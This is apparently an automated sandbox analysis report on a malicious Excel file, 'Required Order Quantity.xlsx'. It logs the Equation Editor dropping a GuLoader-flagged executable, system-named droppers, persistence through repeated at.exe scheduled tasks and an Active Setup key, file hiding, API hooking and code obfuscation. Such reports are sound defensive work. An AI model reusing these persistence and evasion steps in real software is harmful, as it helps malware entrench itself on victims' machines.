Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\system\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\system\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts

Sample is known by Antivirus

Source: Required Order Quantity.xlsx

ReversingLabs: Detection: 22%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe c:\windows\system\explorer.exe
Source: C:\Windows\system\explorer.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe SE
Source: C:\Windows\system\spoolsv.exe	Process created: C:\Windows\system\svchost.exe c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe PR
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:51 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {101D7849-1F13-4446-86DC-A878F583ACDC} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:53 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:55 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:57 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:59 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:03 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:05 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:13 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe c:\users\public\vbc.exe			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe c:\windows\system\explorer.exe			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe SE			Jump to behavior
Source: C:\Windows\system\explorer.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Process created: C:\Windows\system\svchost.exe c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\system\spoolsv.exe c:\windows\system\spoolsv.exe PR			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:51 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:53 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:55 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:57 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 07:59 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:03 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:05 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: C:\Windows\SysWOW64\at.exe at 08:13 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\system\svchost.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: unknown unknown

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Source: Required Order Quantity.xlsx

Static file information: File size 2496512 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe
Source:	Binary string: wuapp.pdb source: explorer.exe, 00000008.00000003.2221194170.000000000095A000.00000004.00000001.sdmp

Document has a 'vbamacros' value indicative of goodware

Source: Required Order Quantity.xlsx

Initial sample: OLE indicators vbamacros = False

Document has an 'encrypted' value indicative of goodware

Source: Required Order Quantity.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2464, type: MEMORY

Yara detected VB6 Downloader Generic

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2464, type: MEMORY

PE file contains an invalid checksum

Source: stsys.exe.10.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3663f
Source: explorer.exe.7.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3c2f2
Source: icsys.icn.exe.4.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x41d85
Source: spoolsv.exe.8.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x35692
Source: mrsys.exe.8.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x3a870
Source: svchost.exe.9.dr	Static PE information: real checksum: 0x3b1c8 should be: 0x39637

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405A3F push ecx; ret		5_2_00405A3D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040715D push es; ret		5_2_004071DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004059E4 push ecx; ret		5_2_004059E5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004059FB push ecx; ret		5_2_00405A3D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004059A0 push ecx; ret		5_2_004059D5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004075BC push es; retf		5_2_004075CB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D0076 push esp; iretd		5_2_003D0077
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D00E3 push esp; iretd		5_2_003D00E4
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E0F867 push edx; retf		8_2_03E0F869
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E08FA6 push ebx; ret		8_2_03E08FA7
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E14F6C push eax; ret		8_2_03E14F72
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E14F02 push eax; ret		8_2_03E14F08
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E0E625 push ds; retf		8_2_03E0E626
Source: C:\Windows\system\svchost.exe	Code function: 10_2_0018E20A push eax; iretd		10_2_0018E231
Source: C:\Windows\system\svchost.exe	Code function: 10_2_0018E126 push eax; iretd		10_2_0018E209
Source: C:\Windows\system\svchost.exe	Code function: 10_2_0018E340 push eax; iretd		10_2_0018E341
Source: C:\Windows\system\svchost.exe	Code function: 10_2_005DBAE5 push ebp; iretd		10_2_005DBAE6
Source: C:\Windows\system\svchost.exe	Code function: 10_2_005DC33C push B8764892h; retn 005Dh		10_2_005DC341
Source: C:\Windows\system\svchost.exe	Code function: 10_2_005D58B6 push 6900005Dh; retf		10_2_005D6632
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2DFA1 push ecx; ret		18_2_1EB2DFB4

Persistence and Installation Behavior:

Drops PE files with benign system names

Source: C:\Windows\system\spoolsv.exe	File created: C:\Windows\system\svchost.exe			Jump to dropped file
Source: C:\Windows\system\explorer.exe	File created: C:\Windows\system\spoolsv.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\system\explorer.exe			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\system\svchost.exe	Executable created and started: c:\windows\system\spoolsv.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Executable created and started: c:\windows\system\explorer.exe			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Executable created and started: c:\windows\system\svchost.exe			Jump to behavior

Drops PE files

Source: C:\Windows\system\spoolsv.exe	File created: C:\Windows\system\svchost.exe			Jump to dropped file
Source: C:\Windows\system\explorer.exe	File created: C:\Users\user\AppData\Roaming\mrsys.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Windows\system\explorer.exe	File created: C:\Windows\system\spoolsv.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\icsys.icn.exe			Jump to dropped file
Source: C:\Windows\system\svchost.exe	File created: C:\Users\user\AppData\Local\stsys.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\system\explorer.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\system\spoolsv.exe	File created: C:\Windows\system\svchost.exe			Jump to dropped file
Source: C:\Windows\system\explorer.exe	File created: C:\Windows\system\spoolsv.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\icsys.icn.exe	File created: C:\Windows\system\explorer.exe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\Public\vbc.exe

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Source: C:\Windows\system\explorer.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPath

Jump to behavior

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\system\svchost.exe

Process created: C:\Windows\SysWOW64\at.exe at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)

Source: C:\Windows\system\explorer.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ShowSuperHidden

Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE5

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
